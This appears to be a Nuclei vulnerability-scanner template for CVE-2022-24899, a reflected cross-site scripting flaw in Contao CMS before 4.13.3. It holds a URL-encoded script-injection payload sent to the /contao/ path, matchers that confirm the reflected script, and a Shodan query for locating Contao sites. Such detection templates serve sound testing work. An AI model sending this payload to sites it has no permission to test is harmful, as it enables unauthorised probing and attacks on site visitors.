nuclei-templates/cves/2022/CVE-2022-24899.yaml

40 lines
1.3 KiB
YAML

id: CVE-2022-24899
info:
name: Contao 4.13.2 - Cross-Site Scripting (XSS)
author: ritikchaddha
severity: medium
description: |
Contao is a powerful open source CMS that allows you to create professional websites and scalable web applications. In versions of Contao prior to 4.13.3 it is possible to inject code into the canonical tag. As a workaround users may disable canonical tags in the root page settings.
reference:
- https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/
- https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2
- https://nvd.nist.gov/vuln/detail/CVE-2022-24899
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-24899
cwe-id: CWE-79
metadata:
shodan-query: title:"Contao"
tags: cve,cve2022,contao,xss,huntr
requests:
- method: GET
path:
- "{{BaseURL}}/contao/%22%3e%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"></script><script>alert(document.domain)</script>'
- '"Not authenticated"'
condition: and
- type: word
part: header
words:
- text/html